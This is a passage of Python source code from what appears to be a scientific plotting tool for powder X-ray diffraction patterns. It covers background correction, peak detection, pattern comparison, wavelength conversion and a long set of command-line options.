= np.append(self.xy, [[xdata], [ydata]], axis=1)\n idx = self.xy[0, :].argsort()\n self.xy = self.xy[:, idx]\n\n if self.topas_bg:\n agreement = calc_agreement(\n self.xyobs, self.xycalc, self.xy, kind=self.bg_correct)\n difference = agreement - self.last_agreement\n self.last_agreement = agreement\n string = f'{agreement:.4f} ({difference:+.4f})'\n else:\n string = \"\"\n\n print(f'+++ {xdata:.4f} {ydata:.4f} {string}')\n\n def background_update(self):\n xy = self.xy.T\n\n if xy.shape[0] < 2:\n self.bg.set_data([], [])\n return\n\n bg_vals = interpolate(xy, self.bg_range, kind=self.bg_correct)\n self.bg.set_data(self.bg_range, bg_vals)\n\n def get_esds(self):\n \"\"\"Returns None if no esds are present on the background, otherwise, it tries to interpolate the esds already present\n The esds should be specified (manually) in the background beforehand.\"\"\"\n\n if self.d is None:\n return None\n\n if self.d.has_esd:\n print('\\nAttempting to interpolate standard deviations... for new background\\n')\n esds = interpolate(self.d.xye[:, 0:3:2], self.xy[0], kind='linear')\n\n else:\n esds = None\n\n return esds\n\n def printdata(self, fout=None):\n \"\"\"Prints stored data points to stdout\"\"\"\n if not self.xy.any():\n print('No stored coordinates.')\n return None\n\n if not fout:\n fout = self.out\n\n esds = self.get_esds()\n\n if self.xrs:\n new_stepco_inp(self.xy, *self.xrs, esds=esds)\n else:\n fout = open(fout, 'w')\n for x, y in self.xy.transpose():\n print(f'{x:15.6f} {y:15.6f}', file=fout)\n\n\nclass Lines:\n\n \"\"\"docstring for Lines\"\"\"\n\n def __init__(self, fig, hide=False):\n super().__init__()\n if hide:\n self.plot = self.black_hole\n self.plot_tick_marks = self.black_hole\n else:\n self.fig = fig\n self.ax = self.fig.add_subplot(111)\n\n self.normalize = False\n self.nomove = False\n self.linewidth = 1.0\n # self.fig.canvas.mpl_connect('pick_event', self.onpick)\n\n def onpick(self):\n \"\"\"General data point picker, should work for all kinds of plots?\"\"\"\n pass\n\n def plot(self, data, lw=None):\n # n = data.index\n # colour = 'bgrcmyk'[n%7]\n\n if not lw:\n lw = self.linewidth\n\n ax = self.ax\n label = data.filename\n\n if self.normalize:\n scale = np.trapz(data.y, data.x)\n # scale = np.max(data.y)\n print(f' >> Scaling {data.filename} by 1/{scale:.5f}')\n data.y = data.y / scale\n # print scale\n # elif 'x_ycalc_no_sda.xy' in data.filename or 'ssz61_am_corr.xye' in data.filename:\n # scale = 500\n # print ' >> Arbitrarily scaling {} {:.5f} [ hardcoded, line {}: lines.plot() ]'.format(data.filename,scale,lineno())\n # data.y = data.y * scale\n\n # scl = 1\n # if 'esd' in data.filename:\n # scl = 20\n\n if self.nomove:\n ax.plot(data.x, data.y, label=label, lw=lw)\n else:\n dx, dy = 0/72., 64/72.\n\n dx *= data.index\n dy *= data.index\n offset = transforms.ScaledTranslation(\n dx, dy, self.fig.dpi_scale_trans)\n transform = ax.transData + offset\n\n # transform broken as of matplotlib 1.2.0, because it doesn't\n # rescale the view\n ax.plot(data.x, data.y, transform=transform, label=label, lw=lw)\n\n ax.axis(\n [data.x.min(), data.x.max()*1.2, data.y.min(), data.y.max()*1.2])\n\n def plot_tick_marks(self, data, i=0):\n ax = self.ax\n\n label = data.filename\n\n dx, dy = 0, -16*(i+1)/72.0\n\n offset = transforms.ScaledTranslation(dx, dy, self.fig.dpi_scale_trans)\n transform = ax.transData + offset\n\n ax.plot(data.x, data.y, transform=transform, c='black',\n label=label, linestyle='', marker='|', markersize=15)\n # plt.plot(tck, np.zeros(tck.size) - (mx_dif / 4), linestyle='', marker='|', markersize=10, label = 'ticks', c='purple')\n\n def plot_ticks_scaled(self, data):\n ax = self.ax\n # label = data.filename\n ax.vlines(data.x, -100, data.y)\n\n def plot_boxes(self, fname):\n \"\"\"http://stackoverflow.com/questions/6895935/data-plotting-in-boxes-with-python\n http://matplotlib.org/api/artist_api.html#matplotlib.patches.Rectangle\"\"\"\n from matplotlib import patches\n\n ax = self.ax\n lw = self.linewidth\n alpha = 0.6\n\n boxes = np.loadtxt(fname, unpack=True)\n print(f'Loading boxes: {fname}\\n shape: {boxes.shape}')\n\n y1 = 0\n\n for x1, x2, y2 in boxes.T:\n # Class matplotlib.patches.Rectangle(xy, width, height, **kwargs)\n rect = patches.Rectangle(\n (x1, y1), x2-x1, y2, edgecolor='red', facecolor='none', lw=lw, alpha=alpha)\n ax.add_patch(rect)\n\n def black_hole(*args, **kwargs):\n pass\n\n\ndef plot_correlation_matrix(arr, labels=[]):\n def formatter(arr, x, y, labels):\n if labels:\n print(f'{x:4}{y:4}{arr[x, y]:8} {labels[x]} {labels[y]}')\n else:\n print(f'{x:4}{y:4}{arr[x, y]:8}')\n\n def onpick(event):\n x, y = int(event.mouseevent.xdata), int(event.mouseevent.ydata)\n formatter(arr, x, y, labels)\n\n threshold = np.max(abs(arr)) * 0.8\n first = True\n\n for x, y in np.argwhere(abs(arr) > threshold):\n if y > x or x == y:\n continue\n if first:\n print(f'\\n Highly correlated parameters (>{threshold}):')\n first = False\n formatter(arr, x, y, labels)\n\n pcolor = plt.pcolor(arr, picker=10)\n\n pick = pcolor.figure.canvas.mpl_connect('pick_event', onpick)\n\n plt.xlim(0, arr.shape[0])\n plt.ylim(0, arr.shape[1])\n plt.colorbar()\n plt.show()\n\n\ndef setup_interpolate_background(d, name='bg (--correct)'):\n print('Interpolation mode for background correction\\n')\n print('The highest and lowest values are added by default for convenience. In the case that they are removed, only the values in the background range will be printed.\\n')\n\n x1 = d.x[0]\n x2 = d.x[-1]\n y1 = d.y[0]\n y2 = d.y[-1]\n\n # print x1,x2,y1,y2\n xy = np.array([[x1, y1], [x2, y2]], dtype=float)\n\n return Data(xy, name=name)\n\n\ndef f_peakdetect(d, lookahead=10, noise=5000):\n from . import peakdetect as pd\n # from functools import partial\n\n _max, _min = pd.peakdetect(d.y, d.x, lookahead=lookahead, delta=noise)\n xm = [p[0] for p in _max]\n ym = [p[1] for p in _max]\n # xn = [p[0] for p in _min]\n # yn = [p[1] for p in _min]\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n d.plot(ax)\n\n peaks, = ax.plot(xm, ym, marker='o', lw=0,\n markeredgecolor='red', markerfacecolor='None', markersize=20)\n\n class Okp:\n\n \"\"\"docstring for okp\"\"\"\n\n def __init__(self, noise, lookahead):\n self.noise = noise\n self.lookahead = lookahead\n self.noisestep = 0\n self.lookaheadstep = 0\n\n print('1,2,3 = lookahead +/-/step')\n print('1,2,3 = noise +/-/step')\n\n printer('lookahead = {}({}), noiselevel = {}({})'.format(self.lookahead, [\n 1, 10, 100][self.lookaheadstep % 3], self.noise, [1, 10, 100][self.noisestep % 3]))\n\n def onkeypress(self, event):\n if event.key == 'q':\n self.lookahead += [1, 10, 100][self.lookaheadstep % 3]\n if event.key == 'w':\n self.lookahead -= [1, 10, 100][self.lookaheadstep % 3]\n if self.lookahead < 1:\n self.lookahead = 1\n if event.key == 'e':\n self.lookaheadstep += 1\n if event.key == '1':\n self.noise += [1, 10, 100][self.noisestep % 3]\n if event.key == '2':\n self.noise -= [1, 10, 100][self.noisestep % 3]\n if self.noise < 0:\n self.noise = 0\n if event.key == '3':\n self.noisestep += 1\n\n printer('lookahead = {}({}), noiselevel = {}({})'.format(self.lookahead, [\n 1, 10, 100][self.lookaheadstep % 3], self.noise, [1, 10, 100][self.noisestep % 3]))\n\n _max, _min = pd.peakdetect(\n d.y, d.x, lookahead=self.lookahead, delta=self.noise)\n xm = [p[0] for p in _max]\n ym = [p[1] for p in _max]\n\n peaks.set_data(xm, ym)\n plt.draw()\n\n okp = Okp(noise, lookahead)\n\n # lines.ax.plot(xn,yn, marker='o', lw=0, markeredgecolor='blue', markerfacecolor='None', markersize=4)\n fig.canvas.mpl_connect('key_press_event', okp.onkeypress)\n plt.show()\n\n xm, ym = peaks.get_data()\n print()\n\n print(' 2theta intensity')\n for x, y in zip(xm, ym):\n print('{:15.4f}{:15.4f}'.format(x, y))\n # print xm,ym\n\n return xm, ym\n\n\ndef f_identify(d, refs, criterium=0.05, lookahead=10, noise=5000):\n import operator\n\n print(d.filename)\n\n print(lookahead, noise)\n\n if lookahead and noise:\n from . import peakdetect as pd\n _max, _min = pd.peakdetect(d.y, d.x, lookahead=lookahead, delta=noise)\n xm = [p[0] for p in _max]\n ym = [p[1] for p in _max]\n print('rawr')\n else:\n xm, ym = f_peakdetect(d)\n\n xm = np.array(xm)\n ym = np.array(ym)\n\n lst = []\n\n for fn in refs:\n # ref = read_data(fn,usecols=4,append_zeros=True,savenpy=False)\n ref = load_tick_marks(fn, col=4)\n\n diff_array = np.abs(xm-ref.x[:, np.newaxis])\n\n # print diff_array\n # print diff_array.shape\n\n min_diff = np.amin(diff_array, 0)\n\n # print min_diff\n\n da = min_diff < criterium\n\n # do manually\n exit()\n\n r = sum(min_diff[da]*min_diff[da]) / sum(xm[da]*xm[da])\n wr = sum(ym[da] * min_diff[da]*min_diff[da]) / \\\n sum(ym[da]*xm[da]*xm[da])\n missing = len(xm) - sum(da)\n\n lst.append((r, wr, missing, ref.filename))\n\n lst = sorted(lst, key=operator.itemgetter(2), reverse=True)\n\n print(lst)\n for (r, rw, missing, fn) in lst:\n print(f'{r:6.3f} {wr:6.3f} using: {missing} refs --> {fn}')\n\n\ndef f_compare(data, kind=0, reference=None):\n import itertools\n import scipy.stats\n import operator\n\n def calc_combined_value(spearmanr, kendallr, pearsonr):\n spearmanr = spearmanr if not np.isnan(spearmanr) else 1.0\n kendallr = kendallr if not np.isnan(kendallr) else 1.0\n pearsonr = pearsonr if not np.isnan(pearsonr) else 1.0\n\n return pearsonr**(1/3.0)*kendallr**(1/3.0)*spearmanr**(1/3.0)\n\n # parameters used for calculated pattern\n start, stop, step = 2, 25.00, 0.01\n\n min_tt = 0 # boundary for check\n max_tt = 2300 # should not excede number of parameters\n\n # shuffle = (-100,-80,-60,-40,-20,0,20,40,60,80,100)\n shuffle = (0,)\n max_shift = max(shuffle)\n min_shift = min(shuffle)\n\n xvals = np.arange(start, stop, step)\n # resample at same step rate as calculated pattern\n data = [Data(np.vstack((xvals, interpolate(\n d.xy, xvals, kind='linear'))).T, name=d.filename, quiet=True) for d in data]\n\n # for d in data:\n # print d.xy.shape\n\n if reference:\n reference = Data(np.vstack(\n (xvals, interpolate(reference.xy, xvals, kind='linear'))).T, name=reference.filename)\n pairs = ((reference, d) for d in data)\n l = float(len(data))\n lfill = len(reference.filename.split('/')[-1])\n rfill = max(len(d.filename.split('/')[-1]) for d in data)\n else:\n lfill = rfill = max(len(d.filename.split('/')[-1]) for d in data)\n pairs = itertools.combinations(data, 2)\n l = float(len(data)*(len(data)-1)/2)\n # pairs = itertools.combinations_with_replacement(data,2)\n\n lst = []\n\n print(f\"Calculate agreement for {int(l)} combinations of {len(data)} patterns.\")\n\n for i, (d1, d2) in enumerate(pairs):\n printer(f\"{i/l:2.0%}\")\n\n names = \"{:<{lfill}} - {:<{rfill}}\".format(\n d1.filename.split('/')[-1], d2.filename.split('/')[-1], lfill=lfill, rfill=rfill)\n\n for shift in shuffle:\n pearsonr, pearsonp = scipy.stats.pearsonr(\n d1.y[min_tt-min_shift+shift:max_tt-max_shift+shift], d2.y[min_tt-min_shift+shift:max_tt-max_shift+shift])\n kendallr, kendallp = scipy.stats.kendalltau(\n d1.y[min_tt-min_shift+shift:max_tt-max_shift+shift:5], d2.y[min_tt-min_shift+shift:max_tt-max_shift+shift:5])\n spearmanr, spearmanp = scipy.stats.spearmanr(\n d1.y[min_tt-min_shift+shift:max_tt-max_shift+shift], d2.y[min_tt-min_shift+shift:max_tt-max_shift+shift])\n\n if pearsonr <= 0 or kendallr <= 0 or spearmanr <= 0:\n continue\n\n # if pearsonp > 0.01 or kendallp > 0.01 or spearmanp > 0.01:\n # continue\n\n combined = calc_combined_value(pearsonr, kendallr, spearmanr)\n\n lst.append((combined, spearmanr, kendallr, pearsonr,\n spearmanp, kendallp, pearsonp, shift*step, names))\n\n printer(\"\")\n print()\n\n lst = sorted(lst, key=operator.itemgetter(kind))\n\n print(f'2theta range = {start+min_tt*step:8.3f} {start+max_tt*step:8.3f}')\n print(f'Shuffle values by {[shift*step for shift in shuffle]}')\n\n print('combined spearman pval kendall pval pearson pval shift -> sorted by {}'.format(['combined', 'spearman', 'kendall', 'pearson'][kind]))\n for (combined, spearmanr, kendallr, pearsonr, spearmanp, kendallp, pearsonp, shift, names) in lst:\n print(f\"{combined:8.3f} {spearmanr:8.3f} {spearmanp:8.3f} {kendallr:8.3f} {kendallp:8.3f} {pearsonr:8.3f} {pearsonp:8.3f} {shift:8.3f} \" + names)\n\n\ndef calc_fwhm(uvw):\n u, v, w = uvw\n th2 = np.linspace(0, 70, 70*50)\n th_rad = np.radians(th2 / 2)\n\n fwhm = (u*np.tan(th_rad)**2 + v*np.tan(th_rad) + w)**0.5\n\n xy = np.vstack([th2, fwhm]).T\n\n return Data(xy, 'UVW')\n\n\ndef fix_sls_data(data, quiet=False):\n \"\"\"Input list of Data objects, all of them will be processed and written to:\n filename_fixed.xye\"\"\"\n\n print()\n print('------------')\n print('FIX SLS DATA')\n print('------------')\n print()\n print('esds are calculated as:')\n print('esd = sqrt(Yobs/scale) * sqrt(1/N) * scale')\n print()\n print('Yobs: input pattern')\n print('scale: scale factor between raw counts (.raw) and corrected data (.dat)')\n print('N: number of raw patterns merged')\n print()\n print('Estimated scale by rearranging above formula:')\n print('(assuming background is correct)')\n print()\n print('scale = (N/Yobs) * esd^2')\n\n if not isinstance(data, list):\n data = list((data,))\n\n scl = input('\\nScale (leave blank for picking procedure) \\n >> ')\n npats = input('\\nNumber of raw patterns \\n >> [16]') or 16\n # scl = 1.3\n npats = float(npats)**0.5\n\n for i in range(len(data)):\n d = data[i]\n i += 1\n if 'esd' in d.filename:\n continue\n\n assert d.has_esd, '\\n *** Data file {} contains no standard deviations!!'.format(\n d.filename)\n\n if not scl:\n print('\\nPick 3 background points')\n print('These will be used to estimate the scale factor')\n print()\n\n fig = plt.figure()\n bg = Background(fig, d=None, quiet=quiet, npick=3)\n lines = Lines(fig, hide=quiet)\n lines.plot(d)\n plt.legend()\n plt.show()\n\n points = bg.xy.T\n\n avg = []\n for x, v in points:\n idx = find_nearest(d.x, x)\n scl1 = d.err[idx]**2 * (npats**2 / d.y[idx])\n avg.append(scl1)\n print(f'{d.err[idx]:10.4f}**2 * ({int(npats**2):d} / {d.y[idx]:10.4f}) = {scl1:10.4f}')\n scl = np.mean(avg)\n else:\n scl = float(scl)\n\n print()\n print('Npats =', int(npats**2))\n print('Scale =', scl)\n print()\n\n err = scl*(1/npats)*(d.y/scl)**0.5\n d2 = np.copy(d.xye)\n d2 = Data(np.vstack((d.x, d.y, err)).T, name=d.filename)\n d2.print_pattern(tag='fixed')\n data.append(d2)\n\n\ndef find_nearest(array, value):\n \"\"\"Find index of nearest value\"\"\"\n idx = (np.abs(array-value)).argmin()\n return idx\n\n\ndef twotheta2d(twotheta, wavelength):\n theta = np.radians(twotheta / 2)\n d = wavelength / (2*np.sin(theta))\n return d\n\n\ndef d2twotheta(d, wavelength):\n theta = np.degrees(np.arcsin((wavelength) / (2*d)))\n return 2*theta\n\n\ndef wavelength2energy(wl):\n \"\"\"Takes wavelength in Angstrom, returns energy in keV\"\"\"\n # 1E3 from ev to kev, divide by 1E10 from angstrom to meter\n return 1E10*planck_constant*speed_of_light/(wl*1E3*elementary_charge)\n\n\ndef energy2wavelength(E):\n \"\"\"Takes wavelength in keV, returns energy in Angstrom\"\"\"\n # 1E3 from ev to kev, divide by 1E10 from angstrom to meter\n return 1E10*planck_constant*speed_of_light/(E*1E3*elementary_charge)\n\n\ndef plot_reciprocal_space(fnobs, fncalc=None, orthogonal_view=True):\n from mpl_toolkits.mplot3d import Axes3D\n\n if orthogonal_view == True:\n from mpl_toolkits.mplot3d import proj3d\n\n def orthogonal_proj(zfront, zback):\n a = (zfront+zback)/(zfront-zback)\n b = -2*(zfront*zback)/(zfront-zback)\n return np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, a, b],\n [0, 0, 0, zback]])\n print(\" >> Orthogonal view at least breaks automatic placement of axis labels.\")\n\n proj3d.persp_transformation = orthogonal_proj\n\n def onkeypress(event):\n if event.key == 'x':\n ax.view_init(0, 0)\n plt.draw()\n if event.key == 'y':\n ax.view_init(0, -90)\n plt.draw()\n if event.key == 'z':\n ax.view_init(90, -90)\n plt.draw()\n\n if fncalc:\n if not isinstance(fncalc, str):\n raise TypeError\n calc = np.loadtxt(fncalc)\n calc = {tuple(map(int, row[0:3])) for row in calc}\n\n if isinstance(fnobs, str):\n fnobs = [fnobs]\n\n try:\n obs = [np.loadtxt(fn) for fn in fnobs]\n except ValueError:\n obs = [np.genfromtxt(fn, delimiter=[4, 4, 4, 8, 8]) for fn in fnobs]\n obs = [{tuple(map(int, row[0:3])) for row in data} for data in obs]\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_xlabel('h')\n ax.set_ylabel('k')\n ax.set_zlabel('l')\n fig.canvas.mpl_connect('key_press_event', onkeypress)\n print(' >> Press x,y,z to align view along specified axis.')\n\n for i, data in enumerate(obs):\n if fncalc:\n diff = calc - data\n absent = data - calc\n data = data & calc\n\n label = fnobs[i]\n\n h, k, l = list(zip(*data))\n ax.plot(h, k, l, 'b.', label=label+' observed', ms=2.50)\n\n # # Feeble attempt at getting heatmaps to work\n # hhm,hxe,hye = np.histogram2d(k,l,bins=50)\n # khm,kxe,kye = np.histogram2d(l,h,bins=50)\n # lhm,lxe,lye = np.histogram2d(h,k,bins=50)\n\n # hm = np.meshgrid(hxe,hye)\n # km = np.meshgrid(kxe,kye)\n # lm = np.meshgrid(lxe,lye)\n\n # ax.contour(hm[0],hm[1],hhm, zdir='x',offset=min(h))\n # ax.contour(km[0],km[1],khm, zdir='y',offset=min(k))\n # ax.contour(lm[0],lm[1],lhm, zdir='z',offset=min(l))\n\n if fncalc:\n h, k, l = list(zip(*diff))\n ax.plot(\n h, k, l, 'ro', label=label+' missing', mfc='None', mec='red')\n if len(absent) > 0:\n h, k, l = list(zip(*absent))\n ax.plot(h, k, l, 'r+', label=label+' sys. absent')\n # ax.plot(h,k,l,'b.',label = label+' observed', ms=2.50)\n else:\n print(' >> 0 systematic absences')\n plt.legend()\n plt.show()\n\n\ndef run_script(gui_options=None):\n description = \"\"\"Notes:\n- Requires numpy and matplotlib for plotting.\n- Scipy is needed for some interpolation functions.\n\"\"\"\n\n epilog = f'Updated: {__version__}'\n\n parser = argparse.ArgumentParser(description=description,\n epilog=epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n\n def parse_wl(string):\n wavelengths = {\"cra1\": 2.28970, \"cra2\": 2.29361, \"cr\": 2.2909,\n \"fea1\": 1.93604, \"fea2\": 1.93998, \"fe\": 1.9373,\n \"cua1\": 1.54056, \"cua2\": 1.54439, \"cu\": 1.5418,\n \"moa1\": 0.70930, \"moa2\": 0.71359, \"mo\": 0.7107,\n \"aga1\": 0.55941, \"aga2\": 0.56380, \"ag\": 0.5608, \"sls\": 1.0000}\n if string.lower().endswith('kev'):\n return energy2wavelength(float(string.lower().replace('kev', \"\")))\n elif string.lower() in wavelengths:\n return wavelengths[string.lower()]\n else:\n return float(string)\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"args\",\n type=str, metavar=\"FILE\", nargs='*',\n help=\"Paths to input files.\")\n\n parser.add_argument(\"-s\", \"--shift\",\n action=\"store_false\", dest=\"nomove\",\n help=\"Slightly shift different plots to make them more visible (useful to make a waterfall plot).\")\n\n parser.add_argument(\"-i\", \"--bgin\",\n action=\"store\", type=str, dest=\"bg_input\",\n help=\"Initial points for bg correction (2 column list; also works with stepco.inp). Overwrites the file with updated coordinates.\")\n\n parser.add_argument(\"-t\", \"--ticks\",\n action='store', type=str, nargs='*', dest=\"plot_ticks\",\n help=\"Specify tick mark file. Assuming list of 2 theta values. Special value => hkl.dat. Specify column with --tc\")\n\n parser.add_argument(\"-r\", \"--range\",\n action='store', type=float, nargs=2, dest=\"plot_range\",\n help=\"Specify plot range for data files.\")\n\n parser.add_argument(\"-c\", \"--bgcorrect\", metavar='OPTION',\n action=\"store\", type=str, dest=\"bg_correct\",\n help=\"Starts background correction routine. Only the first pattern listed is corrected. Valid options: 'linear','nearest','zero', 'slinear', 'quadratic, 'cubic') or as an integer specifying the order of the spline interpolator to use. Recommended: 'cubic'.\")\n\n parser.add_argument(\"--bin\", metavar='binsize',\n action=\"store\", type=float, dest=\"bin\",\n help=\"Bins the patterns supplied with the supplied bins and prints binned data sets.\")\n\n parser.add_argument(\"--compare\", metavar='x',\n action=\"store\", type=int, nargs='?', dest=\"compare\", const=1,\n help=\"Calculates similarity between data sets. For now, background needs to be removed manually beforehand. Sort by VAL: 1 = combined, 2 = spearman, 3 = kendall's tau, 4 = pearson.\")\n\n parser.add_argument(\"-m\", \"--monitor\", metavar='FILE',\n action=\"store\", type=str, dest=\"monitor\",\n help=\"Monitor specified file and replots if the file is updates. First 2 columns are plotted. Supports .prf files from FullProf. Special value: crplot.dat\")\n\n parser.add_argument(\"--topasbg\",\n action=\"store_true\", dest=\"topas_bg\",\n help=\"Generally applicable background correction procedure mainly for use with Topas. Reads x_ycalc.xy, x_ydiff.xy which can be output using macros Out_X_Ycalc(x_ycalc.xy) and Out_X_Difference(x_ydiff.xy). The background is reconstructed using the linear interpolation from --bgin. Recommended usage: lines pattern.xye -c linear --bgin bg_points.xy --topasbg\")\n\n parser.add_argument(\"-n\", \"--normalize\",\n action=\"store_true\", dest=\"normalize_all\",\n help=\"Normalize the values of all data sets by dividing by their integrated intensity\")\n\n group_xrs = parser.add_argument_group(\n 'XRS', description=\"Command line options specific to XRS-82\")\n\n group_xrs.add_argument(\"-x\", \"--xrs\", metavar='FILE',\n action=\"store\", type=str, nargs='?', dest=\"xrs\", const='stepco.inp',\n help=\"xrs stepco file to open and alter. Default = stepco.inp\")\n\n group_xrs.add_argument(\"--crplo\",\n action=\"store_true\", dest=\"crplo\",\n help=\"Mimics crplo -- plots observed, calculated and difference pattern and tick marks\")\n\n group_xrs.add_argument(\"--stepco\",\n action=\"store_true\", dest=\"stepco\",\n help=\"Shortcut for lines stepscan.dat -x stepco.inp. Additionally, plots the previous background and the background + the difference plot. Reads difference data from crplot.dat\")\n\n group_adv = parser.add_argument_group('Advanced options')\n\n group_adv.add_argument(\"-q\", \"--quiet\",\n action=\"store_true\", dest=\"quiet\",\n help=\"Don't plot anything and reduce verbosity.\")\n\n group_adv.add_argument(\"--tc\",\n action='store', type=int, dest=\"plot_ticks_col\", metavar='col',\n help=\"Which column to use for plotting of tick marks. First column = 1. Default = 3, for hkl.dat files\")\n\n parser.add_argument(\"-T\", \"--Ticks\",\n action='store', type=str, nargs='+', dest=\"plot_ticks_scaled\",\n help=\"Plots ticks scaled to the intensity. Expects .xy files with 2 columns, 2th/I\")\n\n parser.add_argument(\"--convert\",\n action='store', type=parse_wl, nargs='+', dest=\"convert_2theta\", metavar=\"WL\",\n help=\"Convert powder pattern to a different wavelength [wavelength_in wavelength_out]. If no diffraction pattern is given, the program will give a small summary for the wavelengths/energies provided\")\n\n group_adv.add_argument(\"--ref\", metavar='FILE',\n # action=\"store\", type=str, nargs='*',\n # dest=\"compare_reference\",\n action=\"store\", type=str, dest=\"compare_reference\",\n help=\"Reference pattern to check against all patterns for --compare\")\n\n group_adv.add_argument(\"--boxes\", metavar='FILE',\n action=\"store\", type=str, dest=\"boxes\",\n help=\"Plots boxes from data in given file. Format should be: 2theta_min, 2theta_max,intensity\")\n\n group_adv.add_argument(\"--savenpy\",\n action=\"store_true\", dest=\"savenpy\",\n help=\"Convert input data sets to numpy binary format for faster loading on next run (extension = .npy). Default = False.\")\n\n group_adv.add_argument(\"--smooth\",\n action=\"store\", type=str, dest=\"smooth\",\n help=\"Smooth data set according to smoothing algorithm given. Choice from: 'flat', 'hanning', 'hamming', 'bartlett', 'blackman','savitzky_golay', 'moving_avg'.\")\n\n group_adv.add_argument(\"--peakdetect\",\n action=\"store\", type=int, nargs=2, dest=\"peakdetect\",\n help=\"Use peak detection algorithm\")\n\n group_adv.add_argument(\"--lw\", \"--linewidth\",\n action=\"store\", type=float, dest=\"linewidth\",\n help=\"Set linewidth of the plot\")\n\n group_adv.add_argument(\"--corrmat\",\n action=\"store\", type=str, dest=\"corrmat\",\n help=\"Plot given file as correlation matrix (expects ascii file with a n*m matrix). Can also take a Topas output file if a matrix has been generated with keyword C_matrix_normalized.\")\n\n group_adv.add_argument(\"--identify\",\n action=\"store\", type=float, dest=\"identify\",\n help=\"Identify given data sets against sets of d-spacings given by --reference\")\n\n group_adv.add_argument(\"--nobg\",\n action=\"store_false\", dest=\"backgrounder\",\n help=\"Turns off background module.\")\n\n group_adv.add_argument(\"--plot_esd\",\n action=\"store_true\", dest=\"plot_esd\",\n help=\"Plots observed intensities and esds for given xye file (exepcts 3 column data).\")\n\n group_adv.add_argument(\"--savefig\",\n action=\"store\", type=str, nargs='?', dest=\"savefig\", const='figure1.png',\n help=\"Saves figure as png instead of displaying it\")\n\n group_adv.add_argument(\"--fixsls\",\n action=\"store_true\", dest='fixsls',\n help=\"Fix SLS data sets and exit\")\n\n group_adv.add_argument(\"--rec3d\",\n action=\"store\", type=str, nargs='*', dest='rec3d',\n help=\"Plot the first 3 columns (h k l) of given file in 3d. If no filenames are given, 'args' are taken. If 2 files are given, the first should be the observed ones and the second should be the calculated ones.\")\n\n group_adv.add_argument(\"--capillary\",\n action=\"store\", type=str, dest='capillary',\n help=\"Give capillary file to be subtracted from the pattern.\")\n\n group_adv.add_argument(\"--uvw\", metavar=(\"U\", \"V\", \"W\"),\n action=\"store\", type=float, nargs=3, dest='plot_uvw',\n help=\"Plot FWHM = (U.tan(theta)^2 + V.tan(theta) + W)^0.5\")\n\n group_adv.add_argument(\"--wavelength\",\n action=\"store\", type=parse_wl, dest='wavelength',\n help=\"Specify the wavelength to use for the powder pattern generation. Default = 1.0 Angstrom\")\n\n group_adv.add_argument(\"--wyd, --weighted_ydiff\",\n action=\"store_true\", dest='weighted_ydiff',\n help=\"Display weighted difference plot. Requires x_yobs.xy, x_ycalc.xy, x_yerr.xy\")\n\n parser.set_defaults(backgrounder=True,\n xrs=None,\n nomove=True,\n normalize_all=False,\n bg_correct=False,\n crplo=False,\n christian=False,\n monitor=None,\n plot_ticks=False,\n plot_ticks_col=1,\n stepco=False,\n topas_bg=False,\n compare=False,\n compare_reference=None,\n quiet=False,\n bg_input=None,\n bg_output=None,\n bg_offset=0,\n boxes=None,\n bin=None,\n # advanced options\n show=True,\n convert_2theta=None,\n linewidth=1.0,\n savenpy=False,\n smooth=False,\n peakdetect=False,\n corrmat=None,\n savefig=False,\n plot_esd=False,\n fixsls=False,\n rec3d=None,\n ipython=False,\n capillary=None,\n uvw=None,\n wavelength=1.0,\n # special\n weighted_ydiff=False,\n guess_filetype=True)\n\n options = parser.parse_args()\n\n if gui_options:\n for k,v in list(gui_options.items()):\n # print k,v\n setattr(options, k, v)\n\n args = options.args\n\n if options.stepco:\n options.xrs = 'stepco.inp'\n args = ['stepscan.dat']\n if options.bg_input:\n copyfile(options.bg_input, options.bg_input+'~')\n options.bg_output = options.bg_input\n\n Data.plot_range = options.plot_range\n\n if options.guess_filetype:\n prf = [arg for arg in args if arg.endswith('.prf')]\n for fn in prf:\n args.remove(fn)\n spc = [arg for arg in args if '.spc' in arg]\n for fn in spc:\n args.remove(fn)\n else:\n prf, spc = None, None\n\n if options.rec3d:\n print(options.rec3d, type(options.rec3d))\n if options.rec3d == 'args':\n plot_reciprocal_space(fnobs=args, fncalc=None)\n elif len(options.rec3d) == 1:\n plot_reciprocal_space(fnobs=options.rec3d[0], fncalc=None)\n elif len(options.rec3d) == 2:\n plot_reciprocal_space(\n fnobs=options.rec3d[0], fncalc=options.rec3d[1])\n\n else:\n raise ValueError\n exit()\n\n data = [read_data(fn, savenpy=options.savenpy, wl=options.wavelength)\n for fn in args] # returns data objects\n\n if options.capillary:\n capillary = read_data(options.capillary)\n smoothed = capillary.smooth(window='hanning', window_len=101)\n for d in data:\n print(f' >> Removing contribution of {options.capillary} from {d.filename}')\n f_bg_correct_out(\n d, smoothed.xy, kind=options.bg_correct, offset=0, suffix_corr='_rem_cap')\n exit()\n\n if options.plot_esd:\n data.extend([read_data(fn, usecols=(0, 2), suffix=' esd')\n for fn in args])\n if spc:\n data.extend([read_data(\n fn, usecols=(0, 2), suffix=' -DIFFaX', savenpy=options.savenpy) for fn in spc])\n\n if options.convert_2theta:\n if data:\n wl_in, wl_out = options.convert_2theta\n data = [d.convert_wavelength(wl_in, wl_out) for d in data]\n for d in data:\n d.print_pattern(tag=f'{wl_out:.2f}')\n else:\n for wl in options.convert_2theta:\n wavelength_info(wl)\n exit()\n\n if options.fixsls:\n fix_sls_data(data, quiet=options.quiet)\n exit()\n\n if options.corrmat:\n f = open(options.corrmat)\n corr, labels = get_correlation_matrix(f)\n plot_correlation_matrix(corr, labels)\n exit()\n\n if options.identify:\n if options.peakdetect:\n lookahead, noise = options.peakdetect\n else:\n lookahead, noise = None, None\n\n for d in data:\n f_identify(\n d, options.compare_reference, lookahead=lookahead, noise=noise)\n elif options.peakdetect:\n # options.show = False\n lookahead, noise = options.peakdetect\n for d in data:\n f_peakdetect(d, lookahead=lookahead, noise=noise)\n\n if options.xrs:\n fname = options.xrs\n copyfile(fname, fname+'~')\n f = read_file(fname)\n bg_data, options.xrs = parse_xrs(f)\n elif options.bg_input:\n try:\n bg_data = read_data(options.bg_input)\n except:\n bg_data = setup_interpolate_background(\n data[0], name=options.bg_input)\n else:\n bg_data = None\n\n fig = plt.figure()\n lines = Lines(fig, 